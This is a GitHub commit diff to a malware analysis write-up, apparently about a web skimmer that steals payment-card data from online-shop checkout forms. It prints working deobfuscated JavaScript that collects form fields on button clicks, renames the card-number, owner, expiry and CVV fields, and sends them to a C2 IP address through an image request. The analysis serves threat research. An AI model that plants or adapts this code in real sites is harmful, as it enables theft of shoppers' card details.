Update Analysis.md

This commit is contained in:
StrangerealIntel 2020-06-02 21:35:58 +02:00 committed by GitHub
parent 51c54f3ad9
commit b439fe3e12


@ -265,18 +265,18 @@ function Push_Cookie(v){document["cookie"]= v+ "=; expires=Thu, 01 Jan 1970 00:0
<h6>The main function executed begins to crawl all the fields of the pages and add to the cookie the data.</h6>
```js
function main()
function main()
{
var b=document["getElementsByTagName"]("button");
for(i= 0;i< b["length"];i++)
{
b[i]["addEventListener"]("click",function()
{
var Data="";
var f=document["getElementsByTagName"]("form");
document["cookie"]= "mage_stats="+ "$"+ "; path=/";
for(z= 0;z< f["length"];z++)
{
var Data="";
var f=document["getElementsByTagName"]("form");
document["cookie"]= "mage_stats="+ "$"+ "; path=/";
for(z= 0;z< f["length"];z++)
{
var inp=f[z]["getElementsByTagName"]("input");
var elements=f[z]["getElementsByTagName"]("select");
for(x= 0;x< inp["length"];x++)
@ -316,31 +316,31 @@ for(z= 0;z< f["length"];z++)
}
}
}
};
};
```
<h6>The last part of the code is to replace the value of before send to the C2 by URL requests, this time in using the creation of an img element, by the url of the img, send the data to theirs C2 domains. This time, this doesn't remove the cookie in the cache and keep it.</h6>
```js
Data= Push_Data("mage_stats");
Data= Data["replace"]("card[num]","cc_number");
Data= Data["replace"]("card[name]","cc_owner");
Data= Data["replace"]("card[exp]","authorizenet_expiration");
Data= Data["replace"]("payment[ccw_exp_year]","authorizenet_expiration_yr");
Data= Data["replace"]("card[cvv]","cc_cid");
Data= Data["replace"]("payment[ps_cc_number]","cc_number");
Data= Data["replace"]("payment[ps_cc_owner]","cc_owner");
Data= Data["replace"]("payment[ps_cc_exp_month]","authorizenet_expiration");
Data= Data["replace"]("payment[ps_cc_exp_year]","authorizenet_expiration_yr");
Data= Data["replace"]("payment[ps_cc_cid]","cc_cid");
if(Data["indexOf"]("cc_number")!== -1|| Data["indexOf"]("cc_cid")!== -1|| Data["indexOf"]("cvv")!== -1|| Data["indexOf"]("cardno")!== -1|| Data["indexOf"]("ccNo")!== -1|| Data["indexOf"]("securityCode")!== -1|| Data["indexOf"]("cardNumber")!== -1|| Data["indexOf"]("numero_cartao")!== -1)
{
Data= Push_Data("mage_stats");
Data= Data["replace"]("card[num]","cc_number");
Data= Data["replace"]("card[name]","cc_owner");
Data= Data["replace"]("card[exp]","authorizenet_expiration");
Data= Data["replace"]("payment[ccw_exp_year]","authorizenet_expiration_yr");
Data= Data["replace"]("card[cvv]","cc_cid");
Data= Data["replace"]("payment[ps_cc_number]","cc_number");
Data= Data["replace"]("payment[ps_cc_owner]","cc_owner");
Data= Data["replace"]("payment[ps_cc_exp_month]","authorizenet_expiration");
Data= Data["replace"]("payment[ps_cc_exp_year]","authorizenet_expiration_yr");
Data= Data["replace"]("payment[ps_cc_cid]","cc_cid");
if(Data["indexOf"]("cc_number")!== -1|| Data["indexOf"]("cc_cid")!== -1|| Data["indexOf"]("cvv")!== -1|| Data["indexOf"]("cardno")!== -1|| Data["indexOf"]("ccNo")!== -1|| Data["indexOf"]("securityCode")!== -1|| Data["indexOf"]("cardNumber")!== -1|| Data["indexOf"]("numero_cartao")!== -1)
{
var result={referer:document["URL"],tag:"YTE4MWE2MDM3NjljMWY5OGFkOTI3ZTczNjdjN2FhNTE=",stats:btoa(Data["hexEncode"]())}; // YTE4MWE2MDM3NjljMWY5OGFkOTI3ZTczNjdjN2FhNTE= -> a181a603769c1f98ad927e7367c7aa51
u= "http://45.197.141.250/analytics.php?statistics_hash="+ btoa(JSON["stringify"](result));
var s=document["createElement"]("IMG");
s["src"]= u;
Push_Cookie("mage_stats");
}
}
})}
}main()})
```